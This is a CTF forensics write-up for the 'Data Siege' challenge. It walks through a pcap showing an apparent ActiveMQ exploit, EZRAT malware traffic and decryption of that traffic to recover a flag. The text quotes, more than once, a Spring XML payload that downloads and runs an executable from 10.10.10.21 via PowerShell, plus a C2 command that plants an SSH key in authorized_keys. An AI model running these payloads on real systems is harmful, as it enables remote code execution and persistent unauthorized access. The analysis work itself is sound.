Data Siege

Personal Rating: Hard

We have the info that the flag is split in three parts

We have a pcap file.

Searching fot http traffic, we have three sets of http requests:

GET /nBISC4YJKs7j4I (tcp stream 2)

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="WHgLtpJX" class="java.lang.ProcessBuilder" init-method="start">
  <constructor-arg>
    <list>
      <value>cmd.exe</value>
      <value>/c</value>
      <value><![CDATA[powershell Invoke-WebRequest 'http://10.10.10.21:8000/aQ4caZ.exe' -OutFile 'C:\temp\aQ4caZ.exe'; Start-Process 'c:\temp\aQ4caZ.exe']]></value>
    </list>
  </constructor-arg>
</bean>
</beans>

GET /nBISC4YJKs7j4I (tcp stream 3)

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="fgCggZBK" class="java.lang.ProcessBuilder" init-method="start">
  <constructor-arg>
    <list>
      <value>cmd.exe</value>
      <value>/c</value>
      <value><![CDATA[powershell Invoke-WebRequest 'http://10.10.10.21:8000/aQ4caZ.exe' -OutFile 'C:\temp\aQ4caZ.exe'; Start-Process 'c:\temp\aQ4caZ.exe']]></value>
    </list>
  </constructor-arg>
</bean>
</beans>

GET /aQ4caZ.exe (tcp stream 4)

<encoded file>

The file is of interest. It looks like its a Windows application called ScreenSpy.

In Wireshark you can export the executable at File > Export Objects > HTTP and choose the file:

(tcp stream 1) shows this:

...y.............Borg.springframework.context.support.ClassPathXmlApplicationContext..&http://10.10.10.21:8080/nBISC4YJKs7j4I...R.ActiveMQ........@...
..StackTraceEnabled....PlatformDetails	..Java..CacheEnabled....TcpNoDelayEnabled....SizePrefixDisabled...	CacheSize.......ProviderName	..ActiveMQ..TightEncodingEnabled....MaxFrameSize......@....MaxInactivityDuration.......u0. MaxInactivityDurationInitalDelay.......'...MaxFrameSizeEnabled....ProviderVersion	..5.18.2

tcp stream 5, which is the last stream, contains a lot of data that looks like a bunch of base64 encoded strings. We can also see some malicious powershell commands.

After dissecting some of the code, we find this: 0r3d_1n_7h3_h34dqu4r73r5}

I extracted the exe file and found a version.txt that she me that the file was a Client for EZRAT 0.1.6.1

I found this in the .text file: Very_S3cr3t_S

I loaded the file in Ghidra. I only found the string above there.

So far I think we have this: Very_S3cr3t_S 0r3d_1n_7h3_h34dqu4r73r5}

It came to mind that the Executable is EZRAT 0.1.6.1 and that the traffic of it might be encrypted. And indeed, checking the application on Github, I found an encryption function. I also noticed that its a C# application, which means that I could easily decompile the downloaded application and potentially read the encrpytion key.

ilSpy can be used to decompile the file, but it is only available for Windows.

A friend wrote a decryptor. The encryption key and IV could be found in the decompiled executable.

Decrypting the TCP stream 5, which is the C2 communication, we find an ssh key that contains the last part of the flag:

cmd;C:;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCwyPZCQyJ/s45lt+cRqPhJj5qrSqd8cvhUaDhwsAemRey2r7Ta+wLtkWZobVIFS4HGzRobAw9s3hmFaCKI8GvfgMsxDSmb0bZcAAkl7cMzhA1F418CLlghANAPFM6Aud7DlJZUtJnN2BiTqbrjPmBuTKeBxjtI0uRTXt4JvpDKx9aCMNEDKGcKVz0KX/hejjR/Xy0nJxHWKgudEz3je31cVow6kKqp3ZUxzZz9BQlxU5kRp4yhUUxo3Fbomo6IsmBydqQdB+LbHGURUFLYWlWEy+1otr6JBwpAfzwZOYVEfLypl3Sjg+S6Fd1cH6jBJp/mG2R2zqCKt3jaWH5SJz13 HTB{c0mmun1c4710n5 >> C:\Users\svc01.ssh\authorized_keys

HTB{c0mmun1c4710n5

So in total, we have this:

HTB{c0mmun1c4710n5 Very_S3cr3t_S 0r3d_1n_7h3_h34dqu4r73r5}

This would make sense but is wrong:

HTB{Very_S3cr3t }

HTB{c0mmun1c4710n5_Very_S3cr3t_S70r3d_1n_7h3_h34dqu4r73r5}

The support told me that the Very_S3cr3t part is wrong and not part of the flag

Okay, the second part of the flag was also part of the encrypted C2 traffic. We just made a mistake when copying it and left something out.

So we got: HTB{c0mmun1c4710n5_h45_b33n_r3570r3d_1n_7h3_h34dqu4r73r5}

PreviousCharacter NextDelulu

Last updated 1 year ago

<?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="WHgLtpJX" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>cmd.exe</value> <value>/c</value> <value><![CDATA[powershell Invoke-WebRequest 'http://10.10.10.21:8000/aQ4caZ.exe' -OutFile 'C:\temp\aQ4caZ.exe'; Start-Process 'c:\temp\aQ4caZ.exe']]></value> </list> </constructor-arg> </bean> </beans>

<?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="fgCggZBK" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>cmd.exe</value> <value>/c</value> <value><![CDATA[powershell Invoke-WebRequest 'http://10.10.10.21:8000/aQ4caZ.exe' -OutFile 'C:\temp\aQ4caZ.exe'; Start-Process 'c:\temp\aQ4caZ.exe']]></value> </list> </constructor-arg> </bean> </beans>

...y.............Borg.springframework.context.support.ClassPathXmlApplicationContext..&http://10.10.10.21:8080/nBISC4YJKs7j4I...R.ActiveMQ........@... ..StackTraceEnabled....PlatformDetails ..Java..CacheEnabled....TcpNoDelayEnabled....SizePrefixDisabled... CacheSize.......ProviderName ..ActiveMQ..TightEncodingEnabled....MaxFrameSize......@....MaxInactivityDuration.......u0. MaxInactivityDurationInitalDelay.......'...MaxFrameSizeEnabled....ProviderVersion ..5.18.2